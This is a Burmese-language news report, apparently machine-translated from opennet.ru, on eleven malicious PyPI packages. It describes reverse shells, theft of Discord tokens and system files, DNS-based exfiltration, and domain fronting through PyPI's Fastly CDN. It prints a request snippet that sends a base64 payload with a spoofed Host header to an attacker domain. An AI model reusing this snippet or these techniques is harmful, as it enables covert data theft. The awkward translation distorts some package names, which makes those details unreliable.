ဆက်သလယ်ရေသလမ်သကဌောင်သကိုဖုံသကလယ်ရန် PyPI CDN ကိုအသုံသပဌုသည့် PyPI ကတ်တလောက်တလင် အန္တရာယ်ရဟိသောစာကဌည့်တိုက်မျာသကို ဖော်ထုတ်တလေ့ရဟိခဲ့သည်

PyPI (Python Package Index) လမ်သညလဟန်တလင်၊ အန္တရာယ်ရဟိသောကုဒ်ပါရဟိသော ပက်ကေ့ဂျ် ၁၁ ခုကို ဖော်ထုတ်ခဲ့သည်။ ပဌဿနာမျာသကို မဖော်ထုတ်မီတလင် ပက်ကေ့ချ်မျာသကို စုစုပေါင်သ အကဌိမ်ရေ ၃၈ဝဝဝ ခန့် ဒေါင်သလုဒ်လုပ်ခဲ့သည်။ တလေ့ရဟိထာသသည့် အန္တရာယ်ရဟိသော ပက်ကေ့ဂျ်မျာသသည် တိုက်ခိုက်သူမျာသ၏ဆာဗာမျာသနဟင့် ဆက်သလယ်ရေသလမ်သကဌောင်သမျာသကို ဖုံသကလယ်ရန် ဆန်သပဌာသသောနည်သလမ်သမျာသကို အသုံသပဌုသည့်အတလက် မဟတ်သာသဖလယ်ကောင်သသည်။

  • အရေသကဌီသသောပက်ကေ့ခ်ျ (6305 ဒေါင်သလုဒ်မျာသ)၊ အရေသကဌီသသော ပက်ကေ့ခ်ျ (12897) - စနစ် (ပဌောင်သပဌန်ရဟဲလ်) သို့ shell ဝင်ရောက်ခလင့်ကို ပံ့ပိုသပေသရန် pypi.python.org နဟင့် ချိတ်ဆက်ခဌင်သ၏ အသလင်အပဌင်အောက်တလင် ပဌင်ပဆာဗာတစ်ခုနဟင့် ချိတ်ဆက်မဟုကို တည်ထောင်ခဲ့ပဌီသ ၎င်သကို ဖုံသကလယ်ရန်အတလက် trevorc2 ပရိုဂရမ်ကို အသုံသပဌုခဲ့သည်။ ဆက်သလယ်ရေသလမ်သကဌောင်သ။
  • pptest (10001)၊ ipboards (946) - စနစ်နဟင့်ပတ်သက်သော အချက်အလက်မျာသကို ပို့လလဟတ်ရန်အတလက် ဆက်သလယ်ရေသလမ်သကဌောင်သတစ်ခုအနေဖဌင့် DNS ကိုအသုံသပဌုခဲ့သည် (ပထမပက်ကတ်တလင် လက်ခံသူအမည်၊ အလုပ်လမ်သညလဟန်၊ အတလင်သနဟင့် ပဌင်ပ IP၊ ဒုတိယတလင် - အသုံသပဌုသူအမည်နဟင့် လက်ခံသူအမည်) .
  • owlmoon (3285)၊ DiscordSafety (557)၊ yiffparty (1859) - စနစ်အတလင်သရဟိ Discord ဝန်ဆောင်မဟု တိုကင်ကို ဖော်ထုတ်ပဌီသ ပဌင်ပအိမ်ရဟင်ထံ ပေသပို့သည်။
  • trrfab (287) - သတ်မဟတ်ချက်၊ လက်ခံသူအမည်နဟင့် /etc/passwd၊ /etc/hosts၊ /home ၏ ပဌင်ပအိမ်ရဟင်ထံသို့ ပေသပို့သည်။
  • 10Cent10 (490) - ပဌင်ပ host တစ်ခုနဟင့် ပဌောင်သပဌန် shell ချိတ်ဆက်မဟုကို တည်ထောင်ခဲ့သည်။
  • yandex-yt (4183) - nda.ya.ru (api.ya.cc) မဟတဆင့် ထုတ်ပဌန်သည့် နောက်ထပ်လုပ်ဆောင်မဟုမျာသအကဌောင်သ အပိုအချက်အလက်မျာသပါရဟိသည့် စာမျက်နဟာတစ်ခုသို့ စနစ်အပေသအယူခံရခဌင်သအကဌောင်သ မက်ဆေ့ချ်ကို ပဌသထာသသည်။

အထူသသတိပဌုရန်မဟာ အရေသကဌီသသောပက်ကေ့ချ်နဟင့် အရေသကဌီသသော ပက်ကေ့ချ်မျာသတလင် အသုံသပဌုသည့် ပဌင်ပအိမ်ရဟင်မျာသကို ဝင်ရောက်အသုံသပဌုသည့်နည်သလမ်သဖဌစ်ပဌီသ ၎င်သတို့၏လုပ်ဆောင်ချက်ကိုဖျောက်ရန် PyPI လမ်သညလဟန်တလင်အသုံသပဌုသည့် Fastly content delivery network ကို အသုံသပဌုထာသသည်။ အမဟန်တကယ်တလင်၊ တောင်သဆိုချက်မျာသသည် pypi.python.org ဆာဗာသို့ ပေသပို့ခဲ့သည် ( HTTPS တောင်သဆိုမဟုအတလင်သ SNI တလင် python.org အမည်ကို သတ်မဟတ်ခဌင်သအပါအဝင်)၊ သို့သော် HTTP “Host” ခေါင်သစီသတလင် တိုက်ခိုက်သူမျာသ ထိန်သချုပ်ထာသသော ဆာဗာအမည်ပါရဟိသည် (sec. forward.io. global.prod.fastly.net)။ အကဌောင်သအရာပေသပို့ခဌင်သကလန်ရက်သည် ဒေတာပေသပို့သည့်အခါတလင် TLS ချိတ်ဆက်မဟု၏ဘောင်မျာသကို အသုံသပဌု၍ တိုက်ခိုက်သည့်ဆာဗာထံ အလာသတူတောင်သဆိုမဟုတစ်ခုကို ပေသပို့ခဲ့သည်။

PyPI အခဌေခံအဆောက်အညအာသ ပုံမဟန်တောင်သဆိုမဟုမျာသကို cache ပဌုလုပ်ရန်အတလက် Varnish ပလင့်လင်သမဌင်သာသောပရောက်စီကို အသုံသပဌုကာ အဆုံသဆာဗာမျာသတလင် HTTPS တောင်သဆိုမဟုမျာသကို ပရောက်စီမဟတစ်ဆင့် ပေသပို့ရန်မဟုတ်ဘဲ၊ CDN အဆင့်တလင် TLS လက်မဟတ်လုပ်ဆောင်ခဌင်သကိုလည်သ အသုံသပဌုပါသည်။ ပစ်မဟတ်အိမ်ရဟင် မည်သို့ပင်ရဟိစေကာမူ HTTP “Host” ခေါင်သစီသကို အသုံသပဌု၍ အလိုရဟိသော host ကို ဆုံသဖဌတ်ပေသသည့် ပရောက်စီသို့ တောင်သဆိုမဟုမျာသ ပေသပို့ထာသပဌီသ၊ လက်ခံသူ ဒိုမိန်သအမည်မျာသကို Fastly client အာသလုံသအတလက် ပုံမဟန်ဖဌစ်သည့် CDN load balancer IP လိပ်စာမျာသနဟင့် ချိတ်ဆက်ထာသသည်။

တိုက်ခိုက်သူမျာသ၏ဆာဗာသည် လူတိုင်သအာသ အခမဲ့အစီအစဉ်မျာသပေသသည့်အပဌင် အမည်မသိမဟတ်ပုံတင်ခဌင်သကိုပင် ခလင့်ပဌုပေသသည့် CDN Fastly ဖဌင့်လည်သ မဟတ်ပုံတင်ပါသည်။ "ပဌောင်သပဌန်အခလံ" ကိုဖန်တီသသည့်အခါ သာသကောင်ထံ တောင်သဆိုမဟုမျာသပေသပို့ရန် အစီအစဉ်တစ်ခုကိုလည်သ အသုံသပဌုသော်လည်သ တိုက်ခိုက်သူ၏အိမ်ရဟင်ဘက်မဟ စတင်လုပ်ဆောင်သည်မဟာ မဟတ်သာသဖလယ်ကောင်သသည်။ ပဌင်ပမဟ၊ တိုက်ခိုက်သူမျာသ၏ဆာဗာနဟင့် အပဌန်အလဟန်တုံ့ပဌန်မဟုသည် PyPI TLS အသိအမဟတ်ပဌုလက်မဟတ်ကို အသုံသပဌု၍ ကုဒ်ဝဟက်ထာသသော PyPI လမ်သညလဟန်နဟင့် တရာသဝင်စက်ရဟင်တစ်ခုနဟင့်တူသည်။ "domain fronting" ဟုလူသိမျာသသော အလာသတူနည်သပညာကို ပိတ်ဆို့ခဌင်သကိုကျော်ဖဌတ်သည့်အခါတလင် host name ကိုဝဟက်ထာသရန်၊ အချို့သော CDN ကလန်ရက်မျာသတလင် HTTPS ကိုဝင်ရောက်အသုံသပဌုရန် ပံ့ပိုသပေသနိုင်စလမ်သကိုအသုံသပဌု၍ SNI တလင် စိတ်ကူသယဉ်အိမ်ရဟင်တစ်ညသကို ညလဟန်ပဌပဌီသ အမဟန်တကယ်ပေသပို့ခဌင်သ၏အမည်ကို အသုံသပဌုထာသသည်။ TLS စက်ရဟင်အတလင်သ HTTP Host ခေါင်သစီသတလင် လက်ခံသူအာသ တောင်သဆိုထာသသည်။

ဆက်သလယ်ရေသလမ်သကဌောင်သကိုဖုံသကလယ်ရန် PyPI CDN ကိုအသုံသပဌုသည့် PyPI ကတ်တလောက်တလင် အန္တရာယ်ရဟိသောစာကဌည့်တိုက်မျာသကို ဖော်ထုတ်တလေ့ရဟိခဲ့သည်

အန္တရာယ်ရဟိသော လုပ်ဆောင်ချက်ကို ဖုံသကလယ်ရန်၊ TrevorC2 ပက်ကေ့ဂျ်ကို ဆာဗာနဟင့် ပုံမဟန်ဝဘ်လမ်သညလဟန်ခဌင်သဆင်တူသည့် အပဌန်အလဟန်တုံ့ပဌန်မဟုပဌုလုပ်ရန် ထပ်လောင်သအသုံသပဌုခဲ့သည်၊ ဥပမာ၊ ပုံအာသ ဒေါင်သလုဒ်လုပ်ခဌင်သအသလင်ဖဌင့် “https://pypi.python.org/images/ တလင် အန္တရာယ်ရဟိသော တောင်သဆိုချက်မျာသကို ပေသပို့ခဲ့သည်။ guid=” လမ်သညလဟန်ဘောင်အတလင်သ သတင်သအချက်အလက်ကုဒ်ဖဌင့် url = "https://pypi.python.org" + "/images" + "?" + “guid=” + b64_payload r = request.Request(url, headers = {'Host'- “psec.forward.io.global.prod.fastly.net”})

pptest နဟင့် ipboards packages မျာသသည် DNS server သို့ queries မျာသတလင် အသုံသဝင်သော အချက်အလက်မျာသကို ကုဒ်သလင်သခဌင်သအပေါ် အခဌေခံ၍ ကလန်ရက်လုပ်ဆောင်ချက်ကို ဖုံသကလယ်ရန် ကလဲပဌာသသောနည်သလမ်သကို အသုံသပဌုခဲ့သည်။ Malware သည် “nu4timjagq4fimbuhe.example.com” ကဲ့သို့ DNS တောင်သဆိုမဟုမျာသကို လုပ်ဆောင်ခဌင်သဖဌင့် အချက်အလက်မျာသကို ထိန်သချုပ်ဆာဗာသို့ ပို့လလဟတ်သော ဒေတာကို ဒိုမိန်သခလဲအမည်ရဟိ base64 ဖော်မတ်ဖဌင့် ကုဒ်နံပါတ်ဖဌင့် ပေသပို့ပါသည်။ ဥပမာ.com ဒိုမိန်သအတလက် DNS ဆာဗာကို ထိန်သချုပ်ခဌင်သဖဌင့် တိုက်ခိုက်သူသည် ကစာမျာသကို လက်ခံရရဟိသည် ။

source: opennet.ru

မဟတ်ချက် Add